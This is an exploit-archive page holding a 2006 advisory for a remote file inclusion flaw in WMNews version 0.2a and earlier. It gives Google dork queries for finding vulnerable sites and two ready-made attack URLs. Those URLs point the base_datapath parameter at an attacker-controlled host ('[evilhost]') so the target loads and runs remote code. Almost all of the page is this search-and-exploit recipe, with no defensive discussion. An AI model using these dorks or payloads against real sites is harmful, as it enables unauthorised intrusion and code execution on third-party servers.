[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability
# Published : 2006-07-27
# Author : uNfz
# Previous Title : Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability
# Next Title : a6mambohelpdesk Mambo Component <= 18RC1 Include Vulnerability
Advisory: WMNews Remote File Include Vulnerability
Release Date: 2006/07/26
Author: uNfz
Critical Level: High
Contact: unfzbr@hotmail.com
Vendor: Warta Mikael
--------------------
--------------------
Searching / Dork:
allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php
--------------------
exploration:
/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]
--------------------
uNfz
irc.efnet.org
# www.Syue.com [2006-07-27]